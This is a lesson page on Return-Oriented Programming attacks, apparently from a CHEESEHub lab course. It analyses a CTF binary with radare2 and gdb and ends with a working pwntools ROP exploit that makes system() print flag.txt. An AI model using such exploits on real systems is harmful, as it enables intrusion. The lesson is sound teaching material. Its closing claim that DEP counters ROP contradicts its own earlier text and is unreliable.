| title | teaching | exercises | questions | objectives | keypoints | |||||
|---|---|---|---|---|---|---|---|---|---|---|
Introduction to ROP Attack |
10 |
30 |
|
|
|
-
ROP stands for "Return-Oriented Programming" and is a type of attack that allows an attacker to take control of a program's execution flow by manipulating its stack.
-
ROP attacks work by finding "gadgets" in the program's code, which are short sequences of instructions that end with a "return" instruction. By chaining these gadgets together, the attacker can construct a new program flow that achieves their desired outcome.
-
ROP attacks are often used to bypass security measures like DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization), which are designed to prevent traditional buffer overflow attacks.
-
ROP attacks can be difficult to defend against, as they don't rely on injecting code into the program's memory like traditional attacks do. Instead, they rely on using the program's own code against itself.
The demonstration on CHEESEHub illustrates the ROP attack using one machines;
- We will analyze the ELF File provided to know what's the vunerabilities of the program
- We will build the payload based on that. We verify the success of the attack by printing the flag.txt.
You will need to conduct the Buffer Overflow attack prior to the ROP attack. If you're not familiar with it, you could refer to Lesson: Introduction to Buffer Overflow Attack You will need to know the knowledge of Assembly Language, pwntools, and Radare2 prior to the ROP Attack. {: .prereq}
You will need to create an account on CHEESEHub to work through this exercise. Each container in this demonstration has a web interface and is accessible through your web browser, no other special software is needed.
We will start by first adding the ROP-Attack application:
figure to be shown
Next, click the View link to go to the application-specific page and start the application containers:
figure to be shown
If a container fails to start, you will see a flashing warning icon next to the container's name. Take a look at the logs to determine the cause of failure and try deleting the application and restarting.
Once all the containers have started, launch each container's web interface in a separate browser tab by clicking the icon next to the container's name.
Enter the directory and
$docker run -it split bash
r2 -AAAA split
Here is the figure of r2 -AAAA split
iI
Check the program's protections and find that NX is enabled.
using afl to list all the functions involved
After analyzing with r2, the main, pwnme, and usefulFunction functions were discovered.
3 figures of find functions
We can see in the pwnme function that there is a buffer with the size of 32 bytes but fgets allow to unput 96 bytes So an overflow will happen and we can use as the start of the payload.
First we use gdb to analyse
And then we generate a random 100 bytes string as input
And then we do pattern-search
We can tell in order to overflowrsp we need 40 bytes
We can see that the usefulFunction is gonna to call system function with string '/bin/ls' as its parameter After we run the program, we can see that '/bin/ls' is used. But our goal is to use '/bin/cat flag.txt' as its parameter so that we can print the flag. So keep searching the gadgets we want.
We can see that there is a string that can print the flag:/bin/cat flag.txt
And the address of this string is 0x0001060.
Now we try to make an overflow and return to the address of system function after that and try to exec the system function with the parameter /bin/cat flag.txt.
In order to do that,we need to pass the address of the string to RDI Register.
We need ROPgadget to help us implement this because it can find related string in the file
!
We can use" pop rdi : ret "to do make it as a gadget.
from pwn import *
#create a process object and load the executable binary
p = process('./split')
#determine the offset to the return address on the stack
offset = 40
#retrieve the addresses of the desired functions/strings using the ELF object
ret_address = 0x00000000004007c3
#construct the payload by padding the offset with arbitrary characters
#then appending the address of the return instruction and the address of the system call with the argument of the flag file
payload = b'A' * offset + p64(ret_address) + p64(0x00601060) + p64(0x0040074b)
#send the payload to the process and get the result
p.sendline(payload)
p.interactive()
We can use DEP as the countermeasure. Data Execution Prevention (DEP): DEP is a security feature that prevents the execution of code from memory pages that are marked as data. This can help prevent attackers from executing malicious code in the first place.